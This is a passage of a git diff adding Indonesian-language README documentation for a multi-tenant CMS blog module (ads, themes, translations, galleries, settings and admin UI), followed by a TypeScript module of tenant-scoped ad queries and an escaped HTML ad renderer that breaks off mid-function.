+`imageUrl`/`linkUrl` wajib URL http(s) absolut — tidak ada field embed/iframe/raw-HTML sama sekali di skema, jadi rendering (`ads-directory.ts`'s `renderAdHtml`, whitelist `<img>`/`<a>` saja) **tidak bisa** jadi kanal XSS apa pun isi request-nya. `placements` (full replace, sama seperti `menu items`) menautkan satu ad ke `global`/`widget`/`post`/`page`; `targetId` wajib untuk tiga terakhir, terlarang untuk `global`. Scheduling: `startsAt`/`endsAt` opsional, `endsAt` wajib > `startsAt` kalau keduanya ada.
+
+`listActiveAdsForPlacement` (query publik-aman: `is_active=true` + jendela jadwal + tenant scope) dan `renderAdHtml` sudah tersedia dan diuji, tapi **belum dipasang ke rute mana pun** — precedent yang sama seperti `searchPublicBlogContent` di Issue #539 ("helper teruji, pemasangannya issue lain").
+
+**Catatan (Issue #638, epic `news_portal`)**: sistem ads di atas TETAP TIDAK BERUBAH dan tetap berlaku untuk `image_url` bebas URL http(s) — `news_portal` epic menambah sistem ad placement TERPISAH yang R2-only (`awcms_news_portal_ad_placements`, dimiliki modul `news_portal`, bukan modul ini) untuk tenant full-online-R2 yang butuh gambar iklan berasal dari objek media R2 terverifikasi, bukan URL bebas. Lihat `.claude/skills/awcms-news-portal/SKILL.md` §638 dan `src/modules/news-portal/README.md`.
+
+### Theme mode — override tenant, bukan engine baru
+
+`GET`/`PATCH /api/v1/blog/theme` membaca/menulis `awcms_blog_theme_settings` (satu baris per tenant). `GET` tanpa baris override mengembalikan `{ mode: <tenant.default_theme>, isOverride: false }` — base theme engine (`awcms_tenants.default_theme`, migration 002) tetap satu-satunya sumber kebenaran default; tabel blog ini murni lapisan override opsional, sama sekali tidak menduplikasi logic tenant.
+
+### Multilingual — kolom link tipis, bukan endpoint baru
+
+Persyaratan inti ("locale-based storage/retrieval", "slug uniqueness tenant+locale aware") **sudah terpenuhi sejak Issue #537** lewat kolom `locale` + partial unique index `(tenant_id, locale, slug)` yang sudah ada di posts/pages — issue ini tidak mendesain ulang itu. Yang baru: kolom `translation_group_id` (nullable, tanpa FK/trigger) supaya beberapa varian-locale dari satu post logis bisa ditautkan. Diimplementasikan sebagai fungsi berdiri sendiri (`localized-content-directory.ts`'s `setPostTranslationGroup`/`fetchPostTranslations`) yang dipanggil dari `POST`/`PATCH /api/v1/blog/posts(/{id})` **setelah** `createBlogPost`/`updateBlogPost` sukses — **bukan** ditambahkan ke `INSERT`/`UPDATE`/`RETURNING` `blog-post-directory.ts` yang sudah ada, karena kolom itu disentuh di 7+ tempat berbeda di file itu; satu `UPDATE` sempit yang independen jauh lebih rendah risiko daripada bedah ulang setiap `RETURNING` clause di file yang sudah teruji sejak Issue #538. Hanya posts, tidak pages (scope-control: cukup satu jalur untuk membuktikan pola-nya bekerja).
+
+### Media/Gallery — block `content_json` baru, bukan tabel media
+
+Doc issue #542 eksplisit: "Do not rebuild the base media library... Integrate with existing media/file capability where available." Base repo ini **tidak punya** media library nyata — `featuredMediaId` di posts/pages (Issue #538) cuma UUID longgar tanpa FK, tervalidasi bentuknya saja. Karena tidak ada yang nyata untuk diintegrasikan, galeri diimplementasikan sebagai tipe block baru di whitelist renderer yang sudah ada (`content-block-rendering.ts`, lihat §Content block schema di §Public routes): `{ type: "gallery", items: GalleryItem[] }`, tiap item `{ mediaType: "image"|"video", url, caption? }`. `url` divalidasi `isAbsoluteHttpUrl` saat render (defense-in-depth yang sama seperti `canonicalUrl`); item gagal validasi di-skip diam-diam (bukan throw). Render hanya `<img>`/`<video controls>` — tidak ada `<iframe>`/embed. Tidak ada endpoint/tabel gallery terpisah — galeri adalah bagian dari `content_json` post/page yang sudah ada, ditulis lewat `PATCH` yang sudah ada juga.
+
+**Update Issue #636** (epic `news_portal`, di luar epic #536): paragraf di atas tetap akurat untuk deployment non-R2-only (mayoritas hari ini). Ketika full-online R2-only mode aktif untuk tenant pemanggil, `featuredMediaId` dan item gallery `mediaType: "image"` WAJIB mereferensikan baris `verified`/`attached` di media registry `news_portal` (Issue #633) — item `mediaType: "video"` dan seluruh perilaku non-R2-only tidak berubah. Tetap **bukan** media library baru di `blog_content` — lihat `.claude/skills/awcms-news-portal/SKILL.md` §636 untuk detail lengkap.
+
+**Update Issue #637** (epic `news_portal`): `public-blog-directory.ts`'s `PublicBlogPostSummary` (listing/archive/homepage-composer queries — sebelumnya hanya `PublicBlogPostDetail`, single-post-by-slug, punya `featuredMediaId`) sekarang juga menyertakan `featuredMediaId`, supaya `news_portal`'s homepage section composer bisa menampilkan gambar unggulan post di kartu ringkasan tanpa query terpisah. Tidak ada perubahan skema/validasi `blog_content` sendiri di sini — murni menambah satu kolom ke SELECT yang sudah ada.
+
+## Settings API (Issue #543)
+
+`GET`/`PATCH /api/v1/blog/settings` (`src/pages/api/v1/blog/settings/index.ts`) — akhirnya mengaktifkan `awcms_blog_settings` (migration 026, satu baris per tenant, `tenant_id` = PK) yang sejak Issue #537 sudah ada di schema tapi tidak punya route. Tidak ada `{id}` di path — sama seperti `PATCH /api/v1/blog/theme`, satu baris per tenant.
+
+```txt
+GET   /api/v1/blog/settings   -> blog_content.settings.read
+PATCH /api/v1/blog/settings   -> blog_content.settings.configure
+```
+
+Field: `defaultLocale`/`defaultVisibility`/`postsPerPage`/`seoDefaultTitle`/`seoDefaultDescription` sudah punya kolom typed sendiri sejak migration 026 (dipakai juga oleh `fetchPublicBlogSettings`, Issue #540, untuk `posts_per_page` pagination publik). `blogTitle`/`blogDescription`/`rssEnabled`/`sitemapEnabled` **tidak** punya kolom sendiri — di luar scope issue ini menambah kolom baru — jadi disimpan di kolom catch-all `settings jsonb` yang tabel itu sudah punya (shallow-merge, bukan replace, sama semantik `updateModuleSettings`). `PATCH` partial-update (hanya field yang dikirim yang divalidasi/ditulis, `domain/blog-settings-policy.ts`'s `validateUpdateBlogSettingsInput`), publish `blog-content.settings.updated` (menutup celah yang README §Domain events sebelumnya catat: channel-nya sudah terdaftar sejak Issue #541 tapi belum ada produsen sampai sekarang) dan audit `blog.settings.updated`.
+
+### RSS/sitemap sekarang menghormati `rssEnabled`/`sitemapEnabled`
+
+`GET /blog/{tenantCode}/feed.xml` dan `.../sitemap-blog.xml` (Issue #540) memanggil `fetchBlogSettings` di awal handler dan mengembalikan `404` yang identik dengan tenant-tidak-ditemukan kalau flag terkait `false` — tenant yang mematikan RSS/sitemap tidak membocorkan sinyal "fitur ini ada tapi dimatikan" vs "tenant ini tidak ada", konsisten dengan ADR-0009's "jangan bocorkan keberadaan tenant" yang sudah diterapkan §Public routes.
+
+## Admin UI (Issue #543)
+
+Seluruh layar di bawah `/admin/blog` (`src/pages/admin/blog/`), memakai `AdminLayout`/design token yang sudah ada (`docs/awcms/14_ui_ux_design_system.md`), Astro + vanilla JS saja — tidak ada framework UI baru. Pola tiap layar identik `admin/modules/[moduleKey].astro`/`admin/access-users.astro` (referensi yang sudah ada sebelum issue ini): SSR read lewat fungsi application-layer yang sama yang dipakai (atau bisa dipakai) endpoint JSON, seluruh mutasi lewat `fetch()` client-side ke endpoint `/api/v1/blog/...` yang sudah ter-guard/audit/idempotency sejak Issue #538-#542 — halaman admin **tidak pernah** menulis ke database langsung atau melewati guard ABAC endpoint. Permission-gated per-section, mengikuti persis guard endpoint yang mendasarinya (defense-in-depth; enforcement sebenarnya tetap di server).
+
+```txt
+/admin/blog                    -> dashboard (ringkasan post/draft/scheduled/pages, quick link)
+/admin/blog/posts              -> daftar post (search, filter status, filter kategori/tag, pagination)
+/admin/blog/posts/new          -> editor post baru
+/admin/blog/posts/[id]         -> editor post (edit, lifecycle action, revision history)
+/admin/blog/pages              -> daftar halaman statis (search, filter status/type, pagination)
+/admin/blog/pages/new          -> editor halaman baru
+/admin/blog/pages/[id]         -> editor halaman (edit saja — tidak ada lifecycle action/revision UI)
+/admin/blog/categories         -> manajer kategori (hierarki, slug conflict terlihat)
+/admin/blog/tags               -> manajer tag (TIDAK ada field parent sama sekali)
+/admin/blog/settings           -> form pengaturan blog + mode tema
+/admin/blog/templates          -> manajer template (opsional, Issue #542)
+/admin/blog/widgets            -> manajer widget (opsional, Issue #542)
+/admin/blog/menus              -> manajer menu (opsional, Issue #542)
+/admin/blog/ads                -> manajer iklan (opsional, Issue #542)
+```
+
+Navigasi sidebar: satu entry `/admin/blog` di `module.ts`'s `navigation` array (label `admin.layout.nav_blog`, guard `blog_content.posts.read`), dirender otomatis oleh `AdminLayout.astro` lewat `fetchVisibleModuleNavigationEntries` (Issue #518) yang sudah ada — bukan ditambahkan hardcode ke `AdminLayout.astro`. Sub-navigasi antar layar `/admin/blog/*` memakai quick-link biasa di dashboard/tiap layar (repo ini tidak punya konvensi sidebar bertingkat).
+
+### Post editor — pemetaan field ke API
+
+`content` dipecah jadi dua field terpisah, sama seperti bentuk data `awcms_blog_posts` sendiri: `contentText` (textarea polos, wajib) dan `contentJson` (textarea JSON berlabel, default `{"blocks":[]}`, divalidasi `JSON.parse` di klien sebelum submit + `validateContentJsonField` di server) — bukan rich-text/block editor baru (`content_json`'s schema sejak Issue #540 hanya 4+1 tipe block, `paragraph`/`heading`/`list`/`quote`/`gallery`; membangun editor visual untuk itu di luar proporsi issue ini). "Category" dan "Tags" dirender sebagai dua `<select multiple>` terpisah (difilter dari term list yang sama by `taxonomyType`) tapi digabung jadi satu array `termIds` saat submit — API sendiri tidak membedakan kategori vs tag di dalam `termIds`.
+
+Lifecycle action (`submit-review`/`publish`/`schedule`/`archive`/`restore`/`purge`) masing-masing dirender hanya kalau `isValidStatusTransition`/`canRestorePost`/`canPurgePost` (fungsi murni yang sama yang dipakai endpoint) mengizinkan transisi itu dari status post saat ini **dan** caller memegang permission aksi itu — cek ini UI-nicety saja, endpoint tetap re-validasi identik. Publish/schedule/archive/restore/purge semuanya: `window.confirm` dulu, lalu `Idempotency-Key` baru (`crypto.randomUUID()`, `lib/ui/admin-form-client.ts`'s `newIdempotencyKey`) per percobaan. Revision history (`blog_content.revisions.read`) menampilkan tabel revisi + tombol "Restore" per baris (`blog_content.revisions.restore`, guard eksplisit terpisah — TIDAK ada ownership override, sama seperti endpoint-nya), juga confirm dulu.
+
+Field "author" (post list + editor) diresolusi lewat `author-lookup.ts`'s `fetchAuthorDisplayNames`, bukan `identity-access`'s user-directory penuh (lihat §Application untuk alasannya).
+
+### Page editor — tanpa lifecycle, tanpa revision UI
+
+Sengaja tidak ada tombol status/publish sama sekali — `UpdateBlogPageInput` tidak punya field `status` (README §Admin API — Blog Pages: page selalu `draft` sejak dibuat, tidak ada endpoint yang mengubahnya). Tidak ada panel revision history untuk page juga — `createBlogRevision` tetap terpanggil dari `PATCH /api/v1/blog/pages/{id}` (baris tersimpan di `awcms_blog_revisions`), tapi tidak ada rute `GET .../revisions` untuk `resource_type='page'` yang bisa dipanggil UI ini (lihat §Belum tersedia — backlog issue lain, bukan sesuatu yang bisa "ditambahkan" cukup dari sisi UI).
+
+### Category/Tag manager — pemisahan file yang disengaja
+
+`admin/blog/categories.astro` dan `admin/blog/tags.astro` adalah dua file terpisah (bukan satu layar param `?type=`) justru supaya larangan "tag tidak boleh punya parent" bisa ditegakkan secara struktural di level markup — `tags.astro` tidak pernah merender elemen form `parentId` sama sekali (bukan field yang disembunyikan lewat kondisi), jadi tidak ada jalur UI yang bisa mengirim `parentId` untuk tag. Keduanya memanggil `/api/v1/blog/terms` yang sama, hanya body `taxonomyType` yang beda. Slug conflict (`409 SLUG_CONFLICT`, tidak ada entry i18n khusus) tampil apa adanya dari pesan server via action banner — sama seperti setiap kode error tak-terpetakan lain di admin UI.
+
+### Templates/Widgets/Ads/Menus — sub-array kompleks via JSON textarea berlabel
+
+`layoutJson` template cukup sederhana (`{columns, sidebarPosition}`) untuk dua `<select>` biasa. `items` menu dan `placements` ads jauh lebih kompleks (array objek, dan `menu items` butuh id ber-UUID client-supplied yang saling mereferensi dalam satu payload, lihat README §Menus) — membangun editor tree/drag-drop khusus untuk itu di luar proporsi anggaran issue ini dan tetap harus menghasilkan bentuk JSON yang sama persis. Kedua form itu memakai textarea JSON berlabel + teks bantuan, pola yang sama seperti `admin/modules/[moduleKey].astro`'s settings panel sudah pakai untuk config terstruktur — tombol "Copy new id" di layar menu menyalin `crypto.randomUUID()` baru ke clipboard (bukan menyisipkannya ke textarea, supaya tidak pernah merusak JSON yang sedang diedit).
+
+### Theme mode masuk ke Settings, bukan layar sendiri
+
+`GET`/`PATCH /api/v1/blog/theme` (Issue #542) digabung ke `/admin/blog/settings` sebagai section tambahan, bukan `/admin/blog/theme` terpisah — ini konfigurasi tenant-wide sekelas field lain di layar itu, dan daftar layar issue #543 sendiri tidak menyebut layar theme terpisah.
+
+### Yang sengaja di-skip: layar Media/Gallery murni
+
+Issue #543's daftar layar opsional menyebut "Media/Gallery" — di-skip sebagai layar tersendiri karena tidak ada media library nyata untuk dikelola (README §Media/Gallery — Issue #542: galeri adalah bagian dari block `content_json`, bukan tabel/endpoint media terpisah). Mengelola galeri berarti mengedit array block `gallery` di dalam `contentJson` post/page — sudah bisa dilakukan lewat textarea `contentJson` yang ada di post/page editor, tidak butuh layar terpisah.
+
+### Aksesibilitas dan UX (doc 14)
+
+Setiap layar admin punya empat state eksplisit — loading (SSR, bukan spinner klien), empty (`p.empty-state`/pesan "belum ada ..."), error (`StateNotice kind="error"` dengan retry-link, dipisah dari `kind="denied"` untuk permission), dan ready (konten). Setiap aksi mutasi men-disable tombol submit-nya sendiri selama request in-flight (`lib/ui/admin-form-client.ts`'s `lockElement`, `aria-busy="true"`) supaya klik ganda/double-Enter tidak pernah mengirim dua request — bukan pengganti idempotency server-side, keduanya berlapis. Aksi high-risk (publish/schedule/archive/restore/purge/delete/purge-config/revision-restore) selalu `window.confirm` dulu. Semua `<label>` terasosiasi eksplisit dengan input-nya (markup `<label>teks<input/></label>`, bukan `aria-label` terpisah, kecuali untuk kontrol icon-only yang memang tidak punya teks visual). Fokus keyboard terlihat lewat `:focus-visible` (bukan `:focus` polos, supaya klik mouse tidak memicu outline yang tidak perlu) di setiap file `<style>` layar. Semua string tampil lewat `t()` (katalog `.po` gettext, `en`+`id`, lihat §Internationalization).
+
+### Internationalization
+
+Seluruh string UI (~300 key baru, namespace `admin.blog.*`) ditambahkan ke `i18n/en.po` **dan** `i18n/id.po` (skill `awcms-i18n`, katalog gettext flat `namespace.key` di root `i18n/`, bukan per-modul) — tidak ada string hardcoded di file `.astro`. Client `<script>` tidak bisa membaca katalog `.po` langsung (server-only, `Bun.file`), jadi tiap layar menyuntikkan string yang sudah diterjemahkan lewat blob `<script type="application/json" id="i18n-strings">` (`readClientStrings()`), pola yang sama seperti `admin/access-users.astro`/`admin/modules/[moduleKey].astro` sudah pakai. `admin.layout.nav_blog` (label sidebar) dan beberapa `common.*` (`filter_all`/`previous_page`/`next_page`) baru — sisanya (`common.error_title`, `common.network_error`, dst.) memakai ulang key yang sudah ada.
+
+### Security notes (ringkasan Issue #543)
+
+- Tidak ada secret hardcoded ditambahkan — layar admin ini murni UI + panggilan ke endpoint yang sudah ada; tidak ada koneksi database langsung dari klien, tidak ada token/API key baru.
+- Tidak ada eksposur PostgreSQL publik — semua akses data tetap lewat `withTenant`/aplikasi backend yang sudah ada, SSR read di frontmatter Astro berjalan server-side (sama seperti `admin/index.astro`/`admin/sync.astro` yang sudah ada sebelum issue ini).
+- Least-privilege runtime DB access — tidak berubah; halaman admin tetap terikat koneksi role `awcms_app` yang sama yang dipakai seluruh app (lihat `docs/awcms/18_configuration_env_reference.md`).
+- RLS isolation — diuji ulang eksplisit di `tests/integration/blog-content-admin-ui.integration.test.ts` untuk dua fungsi baru (`listBlogPostsForAdmin` tenant-isolation test); fungsi lain yang dipanggil layar admin (`listBlogPages`, `listBlogTerms`, dst.) sudah punya cakupan RLS dari test suite Issue #538-#542.
+- Aksi admin high-risk wajib confirm + audit — lifecycle action posts sudah audit sejak Issue #538/#541 (`recordAuditEvent`, action `blog.post.<verb>`); layar admin menambah lapisan `window.confirm` di atasnya, tidak menggantikannya.
+- Rendering publik tetap aman dari XSS — tidak diubah oleh issue ini; `content_json`/`content_text`/widget `bodyText`/ad `imageUrl`/`linkUrl` tetap lewat whitelist renderer yang sama (`content-block-rendering.ts`, `ads-directory.ts`'s `renderAdHtml`). Editor admin (`contentJson` textarea) mengizinkan penulis mengetik apa pun, tapi validasi server (`validateContentJsonField`'s `containsUnsafeHtml`) tetap menolak `<script>`/`<iframe>`/`<embed>`/`<object>`/inline handler/`javascript:` sebelum tersimpan — editor tidak melonggarkan aturan itu.
+- Pesan error tidak membocorkan stack trace — action banner admin selalu menampilkan `error.message` dari respons API (yang sendiri sudah aman, doc 10) atau string generik `common.network_error`, tidak pernah `error.stack`/exception mentah dari `console.error` (yang hanya dicatat server-side).
+
+### Testing commands
+
+```bash
+bun run db:migrate                     # skema tidak berubah di issue ini (0 applied, 30 skipped)
+bun run api:spec:check                 # OpenAPI/AsyncAPI baseline (26 channel blog-content, semua terpakai)
+bun run typecheck                      # tsc --noEmit, termasuk seluruh .astro admin/blog/*
+bun test                               # unit + integration; DATABASE_URL wajib untuk suite integration
+bun test tests/integration/blog-content-admin-ui.integration.test.ts  # test baru khusus Issue #543
+bun run build                          # Astro build, termasuk seluruh layar admin/blog/*
+bun run check                          # lint + check:docs + api:spec:check + typecheck + test + build
+bun run production:preflight           # gate go-live penuh (lihat §Known limitations soal env sandbox)
+```
+
+### Operational checklist (Issue #543)
+
+- [ ] Sebelum deploy: `bun run db:migrate` (idempoten, aman dijalankan berkali-kali).
+- [ ] `bun run check` hijau di CI sebelum merge.
+- [ ] Setelah deploy, verifikasi manual: login sebagai role dengan `blog_content.posts.read` -> `/admin/blog` tampil di sidebar -> buat post draft -> publish -> cek muncul di `/blog/{tenantCode}` (kalau visibility `public`).
+- [ ] Verifikasi `rssEnabled`/`sitemapEnabled` di `/admin/blog/settings`: matikan salah satu -> `feed.xml`/`sitemap-blog.xml` tenant itu mengembalikan 404.
+- [ ] `bun run blog:publish:scheduled` tetap dijadwalkan cron/systemd timer terpisah (Issue #541, tidak berubah oleh issue ini) — bukan dipicu dari UI mana pun.
+- [ ] Audit log (`/admin` -> module audit summary atau `GET /api/v1/logs/audit`) menunjukkan `blog.post.*`/`blog.settings.updated` setelah aksi lifecycle/settings dari UI baru ini.
+
+## Belum tersedia (backlog eksplisit, bukan kelalaian)
+
+- Public page (halaman statis) rendering — hanya post yang punya rute publik di Issue #540, lihat §Public routes.
+- Page revision list/detail/restore endpoints — `createBlogRevision` sudah dipanggil dari `PATCH /api/v1/blog/pages/{id}` (baris tersimpan), tapi tidak ada rute baca/restore untuk `resource_type = 'page'`, hanya post (lihat §Revisions). Admin UI (§Admin UI di atas) karena itu juga tidak punya panel revision untuk page.
+- Rute publik untuk widget/ads rendering (header/sidebar/footer placement nyata di halaman publik) — `listActiveAdsForPlacement`/`renderAdHtml`/`listWidgets({ activeOnly: true })` sudah ada dan teruji, belum dipasang ke rute publik manapun.
+- Rute revisi/`translationGroupId` untuk pages — `setPostTranslationGroup` hanya untuk posts di issue ini.
+- Page lifecycle-action endpoints (`submit-review`/`publish`/`schedule`/`archive`/`restore`/`purge` untuk pages) — permission-nya sudah diseed (Issue #537) tapi tidak ada issue yang eksplisit membangun endpoint-nya; backlog terbuka, bukan bagian #539. Konsekuensinya, editor page (§Admin UI) juga tidak punya tombol status apa pun.
+- Optimistic-concurrency check yang membaca kolom `version` — kolom sudah di-increment tiap write, tapi belum ada endpoint yang menolak write berdasarkan `version` mismatch.
+- Search relevance ranking (`ts_rank`) dan text search config per-locale (`english`/`indonesian`) — `search_vector` sudah weighted (A/B/C) untuk kebutuhan ini di masa depan, tapi `GET /api/v1/blog/search` (admin) dan search publik saat ini hanya mengurutkan `created_at DESC`.
+- Locale-aware negotiation untuk pengunjung publik (mis. header `Accept-Language`) — index/detail publik saat ini menampilkan semua post tanpa filter locale; `<html lang>` memakai locale post/tenant, bukan preferensi pengunjung.
+- `robots.txt` dan referensi sitemap dari `robots.txt` — hanya sitemap XML-nya sendiri yang ada, belum ada yang mereferensikannya secara otomatis.
+- Rich block editor visual untuk `content_json` — admin UI (Issue #543) memakai textarea JSON berlabel untuk `contentJson`/menu items/ad placements, bukan editor visual/drag-drop; membangun itu tetap backlog terbuka kalau suatu saat dianggap perlu.
+- Layar admin murni untuk media/gallery — tidak ada (dan tidak akan ada tanpa base media library nyata); galeri dikelola lewat block `content_json` di editor post/page yang ada.
+- `publicBasePath` (Issue #564) hanya mengubah URL yang DIHASILKAN (canonical link, RSS/sitemap, cross-link internal) — path fisik yang benar-benar dilayani Astro untuk `/news/**` tetap tetap di `/news` (file-based static routing, lihat §Public route settings §`publicBasePath`). Membuat path fisik itu sendiri bisa dikonfigurasi per-tenant (catch-all dynamic route) tetap backlog terbuka, di luar scope issue ini.
+- Visual settings editor khusus untuk `publicRouteMode`/`publicBasePath`/`legacyTenantRouteEnabled`/`publicLabel` (Issue #564) — sengaja tidak dibangun; layar generik `/admin/modules/blog_content` (Module Management, sudah ada) cukup untuk mengedit keempat key ini lewat JSON textarea yang sudah ada.

--- a/src/modules/blog-content/application/ads-directory.ts
+++ b/src/modules/blog-content/application/ads-directory.ts
@@ -1,0 +1,277 @@
+import { escapeHtml } from "../../../lib/html/escape";
+import type { AdPlacementInput, AdPlacementType } from "../domain/ad-policy";
+import type { CreateAdInput, UpdateAdInput } from "../domain/ad-policy";
+
+/** Read/write query module for `awcms_blog_ads`/`_ad_placements` (Issue #542) — same "one directory, reads and writes" convention as `blog-taxonomy-directory.ts`. */
+export type BlogAdView = {
+  id: string;
+  tenantId: string;
+  name: string;
+  imageUrl: string;
+  linkUrl: string | null;
+  isActive: boolean;
+  startsAt: Date | null;
+  endsAt: Date | null;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+};
+
+type BlogAdRow = {
+  id: string;
+  tenant_id: string;
+  name: string;
+  image_url: string;
+  link_url: string | null;
+  is_active: boolean;
+  starts_at: Date | null;
+  ends_at: Date | null;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+};
+
+function toAdView(row: BlogAdRow): BlogAdView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    name: row.name,
+    imageUrl: row.image_url,
+    linkUrl: row.link_url,
+    isActive: row.is_active,
+    startsAt: row.starts_at,
+    endsAt: row.ends_at,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason
+  };
+}
+
+export type BlogAdPlacementView = {
+  id: string;
+  tenantId: string;
+  adId: string;
+  placementType: AdPlacementType;
+  targetId: string | null;
+};
+
+type BlogAdPlacementRow = {
+  id: string;
+  tenant_id: string;
+  ad_id: string;
+  placement_type: AdPlacementType;
+  target_id: string | null;
+};
+
+function toPlacementView(row: BlogAdPlacementRow): BlogAdPlacementView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    adId: row.ad_id,
+    placementType: row.placement_type,
+    targetId: row.target_id
+  };
+}
+
+export async function createAd(
+  tx: Bun.SQL,
+  tenantId: string,
+  input: CreateAdInput
+): Promise<BlogAdView> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_ads
+      (tenant_id, name, image_url, link_url, is_active, starts_at, ends_at)
+    VALUES (
+      ${tenantId}, ${input.name}, ${input.imageUrl}, ${input.linkUrl},
+      ${input.isActive}, ${input.startsAt}, ${input.endsAt}
+    )
+    RETURNING id, tenant_id, name, image_url, link_url, is_active, starts_at, ends_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogAdRow[];
+
+  return toAdView(rows[0]!);
+}
+
+export async function fetchAdById(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<BlogAdView | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, name, image_url, link_url, is_active, starts_at, ends_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_ads
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+  `) as BlogAdRow[];
+
+  const row = rows[0];
+  return row ? toAdView(row) : null;
+}
+
+export async function listAds(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<BlogAdView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, name, image_url, link_url, is_active, starts_at, ends_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_ads
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+    ORDER BY created_at DESC
+    LIMIT 100
+  `) as BlogAdRow[];
+
+  return rows.map(toAdView);
+}
+
+export async function updateAd(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: UpdateAdInput
+): Promise<BlogAdView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_ads
+    SET name = COALESCE(${input.name ?? null}, name),
+        image_url = COALESCE(${input.imageUrl ?? null}, image_url),
+        link_url = CASE WHEN ${input.linkUrl === undefined} THEN link_url ELSE ${input.linkUrl ?? null} END,
+        is_active = COALESCE(${input.isActive ?? null}, is_active),
+        starts_at = CASE WHEN ${input.startsAt === undefined} THEN starts_at ELSE ${input.startsAt ?? null} END,
+        ends_at = CASE WHEN ${input.endsAt === undefined} THEN ends_at ELSE ${input.endsAt ?? null} END,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, name, image_url, link_url, is_active, starts_at, ends_at,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogAdRow[];
+
+  return rows[0] ? toAdView(rows[0]) : null;
+}
+
+export async function softDeleteAd(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_ads
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}
+
+/** Full replace semantics — same "PATCH replaces the whole sub-resource" convention `syncPostTermAssignments`/`syncMenuItems` use. Unlike menu items, placements have no hierarchy, so plain `DELETE` + `INSERT` (DB-generated ids) is sufficient — no client-supplied-id complication. */
+export async function syncAdPlacements(
+  tx: Bun.SQL,
+  tenantId: string,
+  adId: string,
+  placements: readonly AdPlacementInput[]
+): Promise<BlogAdPlacementView[]> {
+  await tx`
+    DELETE FROM awcms_blog_ad_placements
+    WHERE tenant_id = ${tenantId} AND ad_id = ${adId}
+  `;
+
+  const inserted: BlogAdPlacementRow[] = [];
+
+  for (const placement of placements) {
+    const rows = (await tx`
+      INSERT INTO awcms_blog_ad_placements (tenant_id, ad_id, placement_type, target_id)
+      VALUES (${tenantId}, ${adId}, ${placement.placementType}, ${placement.targetId})
+      RETURNING id, tenant_id, ad_id, placement_type, target_id
+    `) as BlogAdPlacementRow[];
+
+    inserted.push(rows[0]!);
+  }
+
+  return inserted.map(toPlacementView);
+}
+
+export async function fetchAdPlacements(
+  tx: Bun.SQL,
+  tenantId: string,
+  adId: string
+): Promise<BlogAdPlacementView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, ad_id, placement_type, target_id
+    FROM awcms_blog_ad_placements
+    WHERE tenant_id = ${tenantId} AND ad_id = ${adId}
+  `) as BlogAdPlacementRow[];
+
+  return rows.map(toPlacementView);
+}
+
+export type ActiveAdForPlacement = {
+  id: string;
+  name: string;
+  imageUrl: string;
+  linkUrl: string | null;
+};
+
+type ActiveAdRow = {
+  id: string;
+  name: string;
+  image_url: string;
+  link_url: string | null;
+};
+
+/**
+ * Public-safe query (Issue #542 §Advertisement Management: "Rendering must
+ * respect tenant isolation... schedule and active status"). Tenant scoped
+ * via the explicit `tenant_id = $1` predicate (RLS FORCE'd defense in
+ * depth, same convention as `public-blog-directory.ts`), `is_active =
+ * true`, and the schedule window (`starts_at`/`ends_at` NULL-permissive —
+ * an unset bound means "no restriction on that side"). Not wired to any
+ * route in this issue (same "tested public-safe helper, wiring is a later
+ * issue's job" precedent `searchPublicBlogContent` set in #539) — a
+ * derived app or #543's admin/public UI work calls this directly.
+ */
+export async function listActiveAdsForPlacement(
+  tx: Bun.SQL,
+  tenantId: string,
+  placementType: AdPlacementType,
+  targetId: string | null,
+  now: Date = new Date()
+): Promise<ActiveAdForPlacement[]> {
+  const rows = (await tx`
+    SELECT a.id, a.name, a.image_url, a.link_url
+    FROM awcms_blog_ads a
+    JOIN awcms_blog_ad_placements p
+      ON p.ad_id = a.id AND p.tenant_id = a.tenant_id
+    WHERE a.tenant_id = ${tenantId} AND a.deleted_at IS NULL AND a.is_active = true
+      AND p.placement_type = ${placementType}
+      AND (p.target_id IS NOT DISTINCT FROM ${targetId})
+      AND (a.starts_at IS NULL OR a.starts_at <= ${now})
+      AND (a.ends_at IS NULL OR a.ends_at >= ${now})
+    ORDER BY a.created_at DESC
+  `) as ActiveAdRow[];
+
+  return rows.map((row) => ({
+    id: row.id,
+    name: row.name,
+    imageUrl: row.image_url,
+    linkUrl: row.link_url
+  }));
+}
+
+/** Whitelist render — `<img>` wrapped in `<a>` only when `linkUrl` is set, both attributes escaped, no other markup possible (doc issue #542: "Advertisement rendering must not become an XSS channel"). URLs are already write-time validated absolute http(s) (`domain/ad-policy.ts`), escaped here purely for HTML-attribute safety, not URL-scheme re-validation. */
+export function renderAdHtml(ad: ActiveAdForPlacement): string {
+  const image = `<img src="${escapeHtml(ad.imageUrl)}" alt="${escapeHtml(ad.name)}">`;
+
